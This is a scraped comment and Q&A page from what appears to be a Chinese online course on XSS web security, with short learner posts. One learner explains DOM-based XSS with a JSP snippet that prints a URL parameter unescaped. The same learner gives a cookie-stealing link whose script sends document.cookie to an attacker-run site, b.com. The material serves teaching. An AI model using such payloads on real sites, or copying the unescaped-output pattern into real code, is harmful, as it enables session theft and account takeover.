Web安全-XSS_技术问答

首页免费课 Web安全-XSS 问答

Web安全-XSS

全部评论问答未解决精华

麦咖啡

0 5-1 课程总结

2018-06-23

慕先生0569267

0 4-3 掌握XSS的防范措施（过滤、校正）

2018-05-26

慕码人3546341

1, 安装node
2, npm install -g express
3, npm install -g express-generator
4, cd进入xss项目文件
5, express -e

3 2-1 区分并理解XSS攻击方式

2018-05-18

慕斯1531740

哈哈<iframe src="http://www.baidu.com"></iframe>

0 4-1 构造接口

2018-05-13

慕斯1531740

0 4-1 构造接口

2018-05-13

欧欧欧欧_0

这是下半部：
假设我知道了小明也注册了该网站，并且知道了他的邮箱(或者其它联系方式)，我做一个超链接发给他，超链接地址为：http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>，当小明点击这个链接的时候(假设他已经登录a.com)，浏览器就会直接打开b.com，并且把小明在a.com中的cookie信息发送到b.com，b.com是我搭建的网站，当我的网站接收到该信息时，我就盗取了小明在a.com的cookie信息，cookie信息中可能存有登录密码，攻击成功！

4 2-1 区分并理解XSS攻击方式

2018-05-12

欧欧欧欧_0

评论字数限制，这是上半部：
DOM Based XSS是一种基于网页DOM结构的攻击。假设当我登录a.com后，我发现它的页面某些内容是根据url中的一个叫content参数直接显示的，猜测它的页面处理可能是这样，其它语言类似：
<html>
<head>
<title>XSS测试</title>
</head>
<body>
<%=request.getParameter("content")%> //看这里看这里，意思就是在页面输出content参数的内容，如果不做任何屏蔽，会有什么结果呢？
</body>
</html>

4 2-1 区分并理解XSS攻击方式

2018-05-12

欧欧欧欧_0

0 5-1 课程总结

2018-05-12